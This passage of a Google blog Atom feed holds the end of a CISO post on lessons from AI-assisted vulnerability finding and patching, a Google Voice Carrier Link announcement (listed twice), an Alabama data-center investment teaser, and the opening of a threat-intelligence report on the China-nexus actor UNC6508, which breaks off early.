&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It’s worth noting that if you can only pick two, we recommend expertise and harness. A less capable model with a good harness and good expert is more powerful than the best model without a good harness or good experts. We also advise using more than one model.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It’s important to track and iterate the data. Since the technology is evolving fast, your data is critical to revise and refine your processes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Second, look carefully at your software supply chain, and engage your key suppliers. Reachability remains a key criteria for fixes, as does streamlining and simplifying the areas you work on.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Third, because there are so many vulnerabilities that can show up, it’s important to have the right methodology to prioritize them. Normally, when you’re rolling out a change you prioritize the smallest blast radius to make incremental change. Here, we recommend flipping that model: Begin with foundational code with the biggest blast radius to tackle the hardest problems first.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AI models can do a good job of developing proof-of-concepts to rapidly test accuracy. Harness and models play a significant role in reducing false positive rate. Adapting your harness to do validation and using a different agent or model to validate results are both very valuable.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Another key to AI-powered triage is to use your harness and tools to state vulnerability confidence as well as severity. Of course, developing a patch is only part of the problem.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Remediate&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Fixing vulnerabilities at Google scale required a fundamental shift in strategy. We developed a new approach centered on three lessons.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;First, how you roll out patches matters. We adopted a risk-based approach that prioritized code reachable from the outside and had the largest blast radius, such as critical applications like BoringSSL and gVisor. We also learned that providing the model with context was the key to faster, more trusted remediation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Second, we learned you cannot fix what you cannot track. To manage remediation at scale, we built a central system to track every vulnerability, from discovery to resolution, with every finding labeled in a central repository. This single source of truth allowed us to enforce service-level objectives (SLOs) for patching, and enabled us to deploy constant autonomous patching with human review. Coupled with robust roll-back capabilities, our teams got better at fixing things quickly and safely.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, we learned to build resilience directly into the system. The ultimate goal was to create an inherently-resilient system that can also patch vulnerabilities, not the other way around. We don't just fix the code; we harden the entire system around it.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These changes helped us rethink our approach to securing open-source software with a three-R’s strategy: Refresh, remove, and rewrite. &lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;First, we &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;refresh&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; what is foundational — finding and fixing vulnerabilities in the code. This is about being good network citizens and protecting the core.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Second, we &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;remove&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; what is peripheral. We are removing dependencies and replacing them with custom code. This is about both efficiency and reducing the attack surface, moving from a broad base of trust to a narrow, controlled one.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Third, we &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;rewrite&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; what is critical. For everything in between, we are transitioning legacy logic and critical capabilities into modern, memory-safe languages using AI to automate the transition to eliminate entire classes of vulnerabilities from that software. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This evolution is a deliberate approach to reduce complexity, shrinking the attack surface, and building a more resilient, autonomous, and secure-by-design foundation for everything we do.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;4. Monitor&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Our work doesn’t stop there, and neither should yours. The security landscape is always changing, and the monitor phase is where our approach comes alive by creating a perpetual feedback loop to ensure we stay secure — and get stronger over time.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We had three key lessons in this phase. First, security demands a constant feedback loop. We created a feedback loop to monitor the entire ecosystem for two things: system strain and vulnerability hotspots. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Second, we invested in tracking our long-term remediation health. You can only improve what you measure. We built a comprehensive asset inventory to track our overall security posture and the completeness of our remediation efforts. Here’s where we hold ourselves accountable to product-level SLOs for vulnerability management. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This system allows us to deploy rolling patches that can update even our data center hardware continuously and use AI agents to verify patch efficacy at a scale no human team could manage.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Third, we planned for the future by using AI agents for both coding and monitoring. You have to assume that at some point, the attackers' models will become more advanced. We need to evolve our operating model and build for that reality.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We use AI agents to automate and standardize our response playbooks, enabling instantaneous containment when an issue is found. We move beyond just finding bugs by feeding key libraries into Gemini to improve its pattern recognition, creating security-aware coding agents. Meanwhile, our AI-assisted red teamers are continuously stress-testing our core infrastructure, ensuring our defenses are always evolving.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The outcome of this constant monitoring is a living, measured program that we can trust.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This is how we protect billions of users every day, and it provides a framework that any team can use to build a defense that learns, adapts, and hardens itself against the threats of tomorrow.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more about AI Threat Defense, you can watch our recent&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://cloudonair.withgoogle.com/events/google-cloud-security-talks-june-2026?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-GLOBAL-STO55-onlineevent-er-dgcsm-JuneSecTl-172732&amp;amp;utm_content=blog&amp;amp;utm_term=-" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Security Talks online event&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Learn something new&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0bfc60a7f0&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Watch now&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;https://www.youtube.com/watch?v=blh0hhHJ4pI&amp;#x27;), (&amp;#x27;image&amp;#x27;, &amp;lt;GAEImage: Cloud-CISO-Perspectives-logo-A&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;In case you missed it&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;Here are the latest updates, products, services, and resources from our security teams so far this month:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Detecting and containing AI-powered threats with Google Security Operations agents&lt;/b&gt;: Learn how Google Security Operations works in concert with AI Threat Defense to monitor, detect, and respond to threats, particularly from code you do not own or can not patch. &lt;a href="https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;How to stop AI voice clones from bypassing your security perimeter&lt;/b&gt;: The traditional, relatively stable network perimeter has been replaced by one far more malleable: Identity, driven by vishing attacks. Here’s how to defend against them. &lt;a href="https://cloud.google.com/transform/how-to-stop-ai-voice-clones-from-bypassing-your-security-perimeter"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;5 lessons from red teaming AI applications&lt;/b&gt;: Distilled from Mandiant’s hands-on red team experiences, check out our clear, concise guidance to help customers securely develop and deploy AI apps. &lt;a href="https://cloud.google.com/transform/5-lessons-from-red-teaming-ai-applications"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Introducing Wiz Cloud Cost: Powering cost management and optimization with context&lt;/b&gt;: Wiz unifies cloud and AI cost visibility to help teams eliminate waste and improve spend efficiency across their AWS, Azure, and Google Cloud environments. &lt;a href="https://www.wiz.io/blog/introducing-wiz-cloud-cost" target="_blank"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Bringing AI agents to Chrome Enterprise security management&lt;/b&gt;: We're launching an open-source model context protocol (MCP) server that connects AI agents directly to Chrome Enterprise APIs, helping IT and security teams manage browser security more efficiently. &lt;a href="https://blog.google/security/bringing-ai-agents-to-chrome-enterprise-security-management/" target="_blank"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;How Google Does It: An inside look at cybersecurity&lt;/b&gt;: Learn how Google approaches some of today's most pressing security topics, challenges and concerns, straight from Google experts. &lt;a href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/how-google-does-it-security-series/" target="_blank"&gt;&lt;b&gt;View the collection&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Please visit the Google Cloud blog for more security stories &lt;a href="https://cloud.google.com/blog/products/identity-security"&gt;published this month&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Join the Google Cloud CISO Community&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0bfc60aa00&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Learn more&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;https://rsvp.withgoogle.com/events/google-cloud-ciso-community-interest-form-2026?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY25-Q1-global-GCP30328-physicalevent-er-dgcsm-parent-CISO-community-2025&amp;amp;utm_content=cisop_&amp;amp;utm_term=-&amp;#x27;), (&amp;#x27;image&amp;#x27;, &amp;lt;GAEImage: GCAT-replacement-logo-A&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;Threat Intelligence news&lt;/b&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Seeking counsel: Ongoing targeted campaign against U.S. law firms&lt;/b&gt;: Mandiant Consulting details a financially-motivated data theft extortion campaign executed by the threat cluster UNC3753, highlighting tactics like physical office targeting, and provides actionable recommendations to safeguard endpoints and infrastructure. &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Welcome to BlackFile: Inside a vishing extortion operation&lt;/b&gt;: Google Threat Intelligence Group (GTIG) has continued to track an expansive extortion campaign by UNC6671, a threat actor operating under the "BlackFile" brand, that targets organizations via sophisticated voice phishing (vishing) and single sign-on (SSO) compromise. &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/blackfile-vishing-extortion-operation"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;2 PhaaS 2 Furious: The evolution of Chinese-language phishing services&lt;/b&gt;: While Russian-speaking threat actors have historically dominated the phishing-as-a-service (PhaaS) landscape, a rival ecosystem is rapidly growing within the Chinese-language underground. Within this ecosystem, GTIG has observed a fundamental move away from static password harvesting towards real-time interception and tokenization. &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Please visit the Google Cloud blog for more threat intelligence stories &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/"&gt;published this month&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;Now hear this: Podcasts from Google Cloud&lt;/b&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Cloud Security Podcast: Deceiving adversaries at scale&lt;/b&gt;: Kevin Conley from Riot Games discusses how modern organizations can use deception technology to gain a home-field advantage against adversaries by proactively monitoring their environments. &lt;a href="https://www.youtube.com/watch?v=1TjSIDXNcu8&amp;amp;t=38s" target="_blank"&gt;&lt;b&gt;Listen here&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Cloud Security Podcast: Hyperscaling cloud security with Wiz&lt;/b&gt;: Yinon Costica, co-founder and VP of product, Wiz, discusses how the company used a product-led approach and a unique security graph model to scale rapidly within the competitive cloud security market. &lt;a href="https://www.youtube.com/watch?v=Csk7I9Utw_U" target="_blank"&gt;&lt;b&gt;Listen here&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Behind the Binary: When AI features create zero-click exploits&lt;/b&gt;: Google Project Zero’s Seth Jenkins joins the podcast to dissect a full two-bug, zero-click exploitation chain targeting the Pixel 9. &lt;a href="https://www.youtube.com/watch?v=U80NrIRrjy0&amp;amp;list=PLjiTz6DAEpuLAykjYGpAUDL-tCrmTpXTf&amp;amp;index=1&amp;amp;t=3s" target="_blank"&gt;&lt;b&gt;Listen here&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;To have our Cloud CISO Perspectives post delivered twice a month to your inbox, &lt;a href="https://cloud.google.com/resources/google-cloud-ciso-newsletter-signup"&gt;sign up for our newsletter&lt;/a&gt;. We’ll be back in a few weeks with more security-related updates from Google Cloud.&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-the-4-lessons-that-guided-ai-threat-defense/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-15T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/carrier-link-for-google-voice.html</id>
    <title>Carrier Link for Google Voice</title>
    <updated>2026-06-15T15:24:16+00:00</updated>
    <content type="html">Carrier Link allows Workspace customers to easily add phone numbers and calling plans from a certified local carrier, leveraging a pre-configured multi-tenant implementation of SIP Link.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDxKa1_s_cn7n9z5IjmTH470XapQH-U3GOIZSVxNaCpEKaBJLi5tl93wx7nVLf4RbbjLigq4O1dvoiPtF-x-d8S0OgEIrUjoi_T_-yOzn91VcOJz0WKBojFHFaUtI4XZspMS8bWb0BtNc-Y5Azl2yNUIPIgLoXRgR52IyO1J0CQvJjfjghZuwNjhQQWAQL/s864/Carrier%20Link%20for%20Voice.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Flow chart showing how Carrier Link works" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDxKa1_s_cn7n9z5IjmTH470XapQH-U3GOIZSVxNaCpEKaBJLi5tl93wx7nVLf4RbbjLigq4O1dvoiPtF-x-d8S0OgEIrUjoi_T_-yOzn91VcOJz0WKBojFHFaUtI4XZspMS8bWb0BtNc-Y5Azl2yNUIPIgLoXRgR52IyO1J0CQvJjfjghZuwNjhQQWAQL/s16000/Carrier%20Link%20for%20Voice.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This simplifies the process of setting up a cloud phone system, allowing customers to make and receive calls with payment handled by their local carrier and minimal configuration. Carrier Link is especially helpful for small businesses that want a reliable connection without the hassle of setting up their own hardware.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;We are launching this feature in &lt;a href="https://knowledge.workspace.google.com/admin/voice/google-voice-operating-system-and-browser-compatibility#SIP" target="_blank"&gt;20 countries&lt;/a&gt; with our Carrier Link partners, &lt;a href="https://www.tatacommunications.com/kaleyra/ucaas/voice-solutions-google-workspace?hs_preview=TKKWkQmY-211617092721" target="_blank"&gt;Tata Communications&lt;/a&gt; and &lt;a href="https://globalsolutions.telefonica.com/es/multinacionales/productos/servicios-de-voz/global-sip-trunk/" target="_blank"&gt;Telefonica Global Solutions&lt;/a&gt;, who have collaborated with Google Voice to offer services via alternative carriers.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;Contact one of our Carrier Link partners to get started. They will provision the SIP Link licenses and phone numbers, which you can then assign to &lt;a href="https://support.google.com/a/answer/9037998" target="_blank"&gt;users&lt;/a&gt;, &lt;a href="https://support.google.com/a/answer/9250113" target="_blank"&gt;desk phones&lt;/a&gt;, &lt;a href="https://support.google.com/a/answer/9204988" target="_blank"&gt;auto-attendants&lt;/a&gt;, and &lt;a href="https://support.google.com/a/answer/9424746" target="_blank"&gt;ring groups&lt;/a&gt;. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/voice/carrier-link-works" target="_blank"&gt;learn more about Carrier Link requirements&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no end user action required.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility) June 15, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to Workspace customers with SIP Link Standard and Premier subscriptions&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/voice/carrier-link-works" target="_blank"&gt;How Carrier Link works&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/voice/answer/115061" target="_blank"&gt;Set up Google Voice&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/voice/manage-carrier-link-numbers" target="_blank"&gt;Manage Carrier Link Number&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/9250113" target="_blank"&gt;Set up Voice desk phones for your organization&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/9204988" target="_blank"&gt;Set up an automated attendant&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/9424746" target="_blank"&gt;Set up ring groups&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Updates  Blog: &lt;a href="https://workspaceupdates.googleblog.com/2022/10/google-voice-sip-link.html" target="_blank"&gt;Use SIP Link to link phone numbers from local carriers to Google Voice&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/carrier-link-for-google-voice.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-15T15:24:16+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/carrier-link-for-google-voice.html</id>
    <title>Carrier Link for Google Voice</title>
    <updated>2026-06-15T15:24:16+00:00</updated>
    <content type="html">Carrier Link allows Workspace customers to easily add phone numbers and calling plans from a certified local carrier, leveraging a pre-configured multi-tenant implementation of SIP Link.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDxKa1_s_cn7n9z5IjmTH470XapQH-U3GOIZSVxNaCpEKaBJLi5tl93wx7nVLf4RbbjLigq4O1dvoiPtF-x-d8S0OgEIrUjoi_T_-yOzn91VcOJz0WKBojFHFaUtI4XZspMS8bWb0BtNc-Y5Azl2yNUIPIgLoXRgR52IyO1J0CQvJjfjghZuwNjhQQWAQL/s864/Carrier%20Link%20for%20Voice.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Flow chart showing how Carrier Link works" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDxKa1_s_cn7n9z5IjmTH470XapQH-U3GOIZSVxNaCpEKaBJLi5tl93wx7nVLf4RbbjLigq4O1dvoiPtF-x-d8S0OgEIrUjoi_T_-yOzn91VcOJz0WKBojFHFaUtI4XZspMS8bWb0BtNc-Y5Azl2yNUIPIgLoXRgR52IyO1J0CQvJjfjghZuwNjhQQWAQL/s16000/Carrier%20Link%20for%20Voice.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This simplifies the process of setting up a cloud phone system, allowing customers to make and receive calls with payment handled by their local carrier and minimal configuration. Carrier Link is especially helpful for small businesses that want a reliable connection without the hassle of setting up their own hardware.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;We are launching this feature in &lt;a href="https://knowledge.workspace.google.com/admin/voice/google-voice-operating-system-and-browser-compatibility#SIP" target="_blank"&gt;20 countries&lt;/a&gt; with our Carrier Link partners, &lt;a href="https://www.tatacommunications.com/kaleyra/ucaas/voice-solutions-google-workspace?hs_preview=TKKWkQmY-211617092721" target="_blank"&gt;Tata Communications&lt;/a&gt; and &lt;a href="https://globalsolutions.telefonica.com/es/multinacionales/productos/servicios-de-voz/global-sip-trunk/" target="_blank"&gt;Telefonica Global Solutions&lt;/a&gt;, who have collaborated with Google Voice to offer services via alternative carriers.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;Contact one of our Carrier Link partners to get started. They will provision the SIP Link licenses and phone numbers, which you can then assign to &lt;a href="https://support.google.com/a/answer/9037998" target="_blank"&gt;users&lt;/a&gt;, &lt;a href="https://support.google.com/a/answer/9250113" target="_blank"&gt;desk phones&lt;/a&gt;, &lt;a href="https://support.google.com/a/answer/9204988" target="_blank"&gt;auto-attendants&lt;/a&gt;, and &lt;a href="https://support.google.com/a/answer/9424746" target="_blank"&gt;ring groups&lt;/a&gt;. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/voice/carrier-link-works" target="_blank"&gt;learn more about Carrier Link requirements&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no end user action required.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility) June 15, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to Workspace customers with SIP Link Standard and Premier subscriptions&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/voice/carrier-link-works" target="_blank"&gt;How Carrier Link works&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/voice/answer/115061" target="_blank"&gt;Set up Google Voice&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/voice/manage-carrier-link-numbers" target="_blank"&gt;Manage Carrier Link Number&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/9250113" target="_blank"&gt;Set up Voice desk phones for your organization&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/9204988" target="_blank"&gt;Set up an automated attendant&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/9424746" target="_blank"&gt;Set up ring groups&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Updates  Blog: &lt;a href="https://workspaceupdates.googleblog.com/2022/10/google-voice-sip-link.html" target="_blank"&gt;Use SIP Link to link phone numbers from local carriers to Google Voice&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/carrier-link-for-google-voice.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-15T15:24:16+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/infrastructure-and-cloud/global-network/alabama-investment-june-2026/</id>
    <title>We’re strengthening our presence in Alabama through new investments and community support.</title>
    <updated>2026-06-15T15:00:00+00:00</updated>
    <content type="html">Google has announced a $1.5 billion investment for 2026 and 2027 to expand its data center campus in Jackson County, Alabama. Operating since 2019 on a repurposed former…</content>
    <link href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/global-network/alabama-investment-june-2026/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-15T15:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/prc-targets-us-medical-research/</id>
    <title>Public and Private Medical Community Targeted by China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, and National Defense Research</title>
    <updated>2026-06-15T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: Patrick Whitsell, John McGuiness&lt;/p&gt;
&lt;hr /&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Threat Intelligence Group (GTIG) has identified a sophisticated campaign attributed to UNC6508, a People's Republic of China (PRC)-nexus threat actor, targeting institutions in the North American academic, medical, and military research community. While remaining undetected for over a year, the threat actor compromised externally facing web applications, deployed bespoke malware, pivoted to sensitive internal systems, and abused enterprise administrative tools for covert data exfiltration. The threat actor had broad collection aspirations, including sensitive defense intelligence related to national security, Indo-Pacific command operations, artificial intelligence, uncrewed vehicle systems, cyber offensive programs, and medical research. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG disrupted the malicious infrastructure associated with this threat actor. Working with Mandiant Consulting, we notified the affected organizations upon detection and offered our assistance with remediation. We have updated &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/security-operations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Security Operations&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (SecOps) with relevant intelligence, enabling defenders to identify indicators of compromise (IOCs) within their networks. We encourage all users and customers to follow recommended best practices for &lt;/span&gt;&lt;a href="https://knowledge.workspace.google.com/admin/apps/best-practices-for-third-party-idp-and-google-workspace-configuration" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;third-party Identity 